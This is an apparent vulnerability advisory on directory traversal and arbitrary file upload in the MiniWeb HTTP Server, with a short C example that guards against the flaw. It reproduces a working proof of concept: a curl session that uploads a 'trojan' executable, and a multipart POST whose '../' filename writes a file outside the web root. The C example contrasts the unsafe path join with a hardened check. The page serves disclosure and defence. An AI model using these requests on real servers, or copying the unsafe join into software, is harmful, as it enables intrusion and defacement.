MiniWeb HTTP Server Directory Traversal and Arbitrary File Upload Vulnerability
Published: 2013-04-09
Updated: 2013-04-10
Affected systems:
sourceforge MiniWeb HTTP Server 0.x
Description:
BUGTRAQ ID: 58946
MiniWeb is a tiny web server written in C and developed for embedded applications.
MiniWeb HTTP Server 20130309 and other versions contain a security vulnerability: an attacker can exploit it to upload malicious files to arbitrary locations on the server.
<* Source: Akastep
Links: http://secunia.com/advisories/52923/
http://dl.packetstormsecurity.net/1304-exploits/miniweb-shelltraversal.txt
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users assume all risk!
Arbitrary File Upload:
user@myhost /cygdrive/c/dir1/dir2
user@myhost /cygdrive/c/dir1/dir2
$ curl -I www.example.com
curl: (52) Empty reply from server
user@myhost /cygdrive/c/dir1/dir2
$ curl www.example.com
<html><head><title>/</title></head><body><table border=0 cellpadding=0
cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td
width=35%><a href='../'>..</a></td><td width=15%><dir></td><td
width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr></
table><hr><i>Directory content generated by MiniWeb</i></body></html>
user@myhost /cygdrive/c/dir1/dir2
$ #Uploading remotely our trojan to remote system.
user@myhost /cygdrive/c/dir1/dir2
$ curl -i -F name=taskmgr.exe -F filedata=@taskmgr.exe
http://192.168.0.15:8000/epicfail/
HTTP/1.1 404 Not Found
Server: MiniWeb
Content-length: 125
Content-Type: text/html
<html><head><title>404 Not Found</title></head><body><h1>Not
Found</h1><p>The requested URL has no content.</p></body></html>
user@myhost /cygdrive/c/dir1/dir2
$ #Now fetching directory index from remote system.
user@myhost /cygdrive/c/dir1/dir2
$ curl www.example.com
<html><head><title>/</title></head><body><table border=0 cellpadding=0
cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td
width=35%><a href='../'>..</a></td><td width=15%><dir></td><td
width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr><t
r><td width=35%><a href='taskmgr.exe'>taskmgr.exe</a></td><td
width=15%>329 KB</td><td width=15%>exe file</td><td>Sun, 07 Apr 2013
00:14:38 GMT</td></tr></table><hr><i>Directory content generated by
MiniWeb</i></body></html>
user@myhost /cygdrive/c/dir1/dir2
user@myhost /cygdrive/c/dir1/dir2
$ #Lol our trojan (taskmgr.exe) uploaded successfully) This is design flaw.
user@myhost /cygdrive/c/dir1/dir2
$ curl www.example.com/taskmgr.exe>task2.exe
user@myhost /cygdrive/c/dir1/dir2
$ file task2.exe
task2.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX
compressed
user@myhost /cygdrive/c/dir1/dir2
$ rm -rf task2.exe
Directory Traversal:
METHOD: POST
URL: http://www.example.com/AAAAAAAAAAAAAAAAAAAAAAA
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------78522398122376
Content-Length: 84906
request body:
-----------------------------78522398122376
Content-Disposition: form-data; name="user"
-----------------------------78522398122376
Content-Disposition: form-data; name="pass"
-----------------------------78522398122376
Content-Disposition: form-data; name="file";
filename="../../../../../../../../../../../../../OWNED_BY_AKASTEP.txt"
Content-Type: image/png
Dude! Your machine OwnEd!
-----------------------------78522398122376
Content-Disposition: form-data; name="button"
Upload
-----------------------------78522398122376--
================================================================================
Few Printscreens:
1remotesystem.PNG
http://s019.radikal.ru/i612/1304/09/510e3b430b04.png
2attackersends.PNG
http://s017.radikal.ru/i406/1304/a1/494cef4de6f0.png
3remotesystempwned.PNG
http://s05.radikal.ru/i178/1304/f3/5fe4d9cb2111.png
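The defect behind the request above is an upload handler that takes the multipart `filename=` value and uses it as a path under the server's directory, so a name made of `../` components is written outside that directory. The C program below is an added example and is not MiniWeb's code: it places the unsafe join (the pattern the advisory describes) beside a hardened version that rejects any name containing a separator or a leading dot and then re-checks that the final path still sits under the upload directory. `UPLOAD_ROOT`, `MAX_NAME`, and all function names are assumptions made for this example; the only value taken from the page is the filename from the request body.

```c
/* Added example (not MiniWeb code): safe handling of a multipart filename=
 * value. UPLOAD_ROOT and MAX_NAME are assumed values for the example. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define UPLOAD_ROOT "/var/www/uploads"   /* assumed upload directory */
#define MAX_NAME    64                   /* assumed filename limit   */

/* Vulnerable pattern: the client-supplied name goes straight into the path,
 * so a name beginning with "../" escapes UPLOAD_ROOT. Returns 1 if it fit. */
int build_upload_path_unsafe(const char *client_name, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "%s/%s", UPLOAD_ROOT, client_name);
    return n >= 0 && (size_t)n < outlen;
}

/* 1 if the name carries a separator or "..", i.e. is worth logging as a
 * traversal attempt; 0 otherwise. Backslash is included because MiniWeb
 * also runs on Windows, as the advisory's session shows. */
int looks_like_traversal(const char *client_name)
{
    return strchr(client_name, '/') != NULL
        || strchr(client_name, '\\') != NULL
        || strstr(client_name, "..") != NULL;
}

/* Hardened: accept only a plain name made of [A-Za-z0-9._-] that is not
 * empty, does not start with '.' (covers ".", ".." and dotfiles) and is not
 * too long. Anything else is rejected rather than "cleaned". */
int sanitize_upload_name(const char *client_name, char *out, size_t outlen)
{
    size_t n = strlen(client_name);
    if (n == 0 || n >= MAX_NAME || n >= outlen) return 0;
    if (client_name[0] == '.') return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)client_name[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-')) return 0;
    }
    memcpy(out, client_name, n + 1);
    return 1;
}

/* Hardened join: sanitize first, then independently verify that the result
 * is UPLOAD_ROOT plus exactly one path component. Returns 1 on success. */
int build_upload_path_safe(const char *client_name, char *out, size_t outlen)
{
    char name[MAX_NAME];
    const char *prefix = UPLOAD_ROOT "/";
    if (!sanitize_upload_name(client_name, name, sizeof name)) return 0;
    int n = snprintf(out, outlen, "%s/%s", UPLOAD_ROOT, name);
    if (n < 0 || (size_t)n >= outlen) return 0;
    if (strncmp(out, prefix, strlen(prefix)) != 0) return 0;
    if (strchr(out + strlen(prefix), '/') != NULL) return 0;
    return 1;
}

/* The filename from the advisory's request body, used as the check input. */
static const char *POC_NAME =
    "../../../../../../../../../../../../../OWNED_BY_AKASTEP.txt";

/* Demo helpers: each returns 1 when the property it names holds. */
int demo_unsafe_passes_traversal(void)
{
    char path[256];
    return build_upload_path_unsafe(POC_NAME, path, sizeof path)
        && strstr(path, "/../") != NULL;          /* traversal survives */
}

int demo_safe_rejects_traversal(void)
{
    char path[256];
    return looks_like_traversal(POC_NAME)
        && !build_upload_path_safe(POC_NAME, path, sizeof path)
        && !build_upload_path_safe("..\\..\\x.txt", path, sizeof path)
        && !build_upload_path_safe("..", path, sizeof path)
        && !build_upload_path_safe("", path, sizeof path);
}

int demo_safe_accepts_plain_name(void)
{
    char path[256];
    return build_upload_path_safe("taskmgr.exe", path, sizeof path)
        && strcmp(path, UPLOAD_ROOT "/taskmgr.exe") == 0
        && !looks_like_traversal("taskmgr.exe");
}

int main(void)
{
    printf("unsafe join keeps traversal:  %d\n", demo_unsafe_passes_traversal());
    printf("safe join rejects traversal:  %d\n", demo_safe_rejects_traversal());
    printf("safe join accepts plain name: %d\n", demo_safe_accepts_plain_name());
    return 0;
}
```

The two-layer design is deliberate: `sanitize_upload_name` enforces an allow-list on the name, and `build_upload_path_safe` checks the assembled path again, so a later relaxation of the allow-list cannot silently reopen the traversal. `looks_like_traversal` is separate so a server can log rejected names as an indicator of probing without affecting the accept/reject decision.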
Recommendations:
Vendor patch:
sourceforge
-----------
The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's homepage for the latest version:
http://miniweb.sourceforge.net/